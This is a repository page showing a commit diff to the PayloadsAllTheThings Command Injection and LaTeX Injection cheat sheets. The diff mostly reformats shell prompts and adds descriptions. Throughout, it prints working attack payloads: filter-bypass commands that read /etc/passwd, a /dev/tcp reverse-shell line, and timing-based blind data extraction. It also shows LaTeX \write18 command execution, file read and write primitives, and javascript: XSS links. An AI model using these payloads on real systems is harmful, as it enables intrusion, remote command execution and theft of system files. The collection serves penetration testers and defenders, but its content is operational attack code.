ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #424 from p0dalirius/master

Browse Source 
Added missing descriptions and fixed color formatting for LaTeX
This commit is contained in:
Swissky 2021-09-29 09:39:35 +02:00 committed by GitHub
commit df7172dca1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 45 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
Command Injection/README.md
View File

@ -71,23 +71,23 @@ Works on Linux only.
swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
swissky@crashlab:~$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd
swissky@crashlab:~$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X
swissky@crashlab:~$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242
```
Commands execution without spaces, $ or { } - Linux (Bash only)
@ -114,28 +114,28 @@ something%0Acat%20/etc/passwd
Linux
```powershell
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764`
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
@ -144,19 +144,19 @@ root:x:0:0:root:/root:/bin/bash
Commands execution without backslash and slash - linux bash
```powershell
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
@ -221,12 +221,12 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
Extracting data : char by char
```powershell
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

43
LaTeX Injection/README.md
View File

@ -2,14 +2,16 @@
## Read file
```bash
Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd}
\include{password} # load .tex file
\include{somefile} # load .tex file (somefile.tex)
```
Read single lined file
Read single lined file:
```bash
```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
@ -17,9 +19,9 @@ Read single lined file
\closein\file
```
Read multiple lined file
Read multiple lined file:
```bash
```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
@ -29,47 +31,52 @@ Read multiple lined file
\closein\file
```
Read text file, keep the formatting
Read text file, **without** interpreting the content, it will only paste raw file content:
```bash
```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
```bash
Write single lined file:
```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```
## Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash
\immediate\write18{env > output}
```tex
\immediate\write18{id > output}
\input{output}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash
```tex
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
```tex
\input|ls|base64
\input{|"/bin/hostname"}
```
## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)